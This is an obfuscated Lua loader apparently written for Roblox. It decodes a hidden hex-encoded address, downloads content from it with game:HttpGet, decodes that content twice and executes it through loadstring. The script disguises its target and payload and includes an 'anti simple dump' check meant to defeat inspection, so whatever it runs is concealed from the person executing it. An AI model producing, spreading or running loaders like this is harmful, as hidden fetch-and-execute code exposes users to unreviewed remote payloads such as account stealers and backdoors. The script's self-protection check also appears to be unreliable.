loadstring((function(...)
    local _0xA = {"\114","\101","\116","\117","\114","\110"}
    local function _0xB(x) return string.char(tonumber(x)) end

    local function _0xC(str)
        local t = {}
        for i = 1, #str do
            t[i] = string.char((string.byte(str, i) ~ 7) - 2)
        end
        return table.concat(t)
    end

    local _0xD = (function()
        local h = "6a7979793a2c2c75667534756e6e6c6c2e6c6a7d6c6c6a2e6a66786c6e6c2e68666e2c6e696a6a7e6c6c2e6a6e6c2e6a6c6c2e6a6e"
        local r = ""
        for i = 1, #h, 2 do
            local byte = tonumber(h:sub(i,i+1),16)
            r = r .. string.char((byte ~ 5) - 1)
        end
        return r
    end)()

    local function _0xE(u)
        local s = game:HttpGet(u)
        local e = {}
        for i = 1, #s do
            local b = string.byte(s, i)
            e[i] = string.char(((b + 11) ~ 3) - 6)
        end
        return table.concat(e)
    end

    local function _0xF(d)
        local out = {}
        for i = 1, #d do
            local b = string.byte(d, i)
            out[i] = string.char(((b + 6) ~ 3) - 11)
        end
        return table.concat(out)
    end

    -- anti simple dump
    if (debug and debug.getinfo) then
        local info = debug.getinfo(1)
        if info and info.source ~= "=[C]" then
            return ""
        end
    end

    local data = _0xE(_0xD)
    local final = _0xF(data)

    return final
end)())()
